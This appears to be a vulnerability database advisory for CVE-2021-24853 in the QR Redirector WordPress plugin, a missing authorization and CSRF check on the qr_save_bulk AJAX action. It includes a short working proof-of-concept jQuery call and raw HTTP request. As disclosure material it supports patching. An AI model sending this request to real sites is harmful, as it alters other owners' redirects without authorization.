WordPress Plugin Vulnerabilities

QR Redirector < 1.6 - Subscriber+ Arbitrary QR Redirect Response Status Update

Description

The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qr_save_bulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects

Proof of Concept

jQuery.post(ajaxurl, {
qr_redirect_response: 308,
post_ids: [830],
action: "qr_save_bulk"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Connection: close
Cookie: [any authenticated user]

qr_redirect_response=308&post_ids%5B%5D=830&action=qr_save_bulk

Affects Plugins

Plugin icon
qr-redirector
Fixed in 1.6

References

CVE
CVE-2021-24853

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
240bed24-0315-4bbf-ba17-e4947e5ecacb

Timeline

Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)

Other

Published
Title
Published
2020-09-22
Title
Coditor <= 1.1 - Arbitrary File Edition, Deletion and Internal Directory Listing in wp-content
Published
2021-01-28
Title
uListing < 1.7 - Unauthenticated Arbitrary Account Creation
Published
2024-01-16
Title
User Profile Builder < 3.10.9 - Missing Authorization to Plugin Settings Change via wppb_two_factor_authentication_settings_update
Published
2021-08-23
Title
Timetable and Event Schedule by MotoPress < 2.4.2 - Unauthorised Event TimeSlot Deletion
Published
2022-03-29
Title
Flo Launch < 2.4.1 - Missing Authentication Allow Full Site Takeover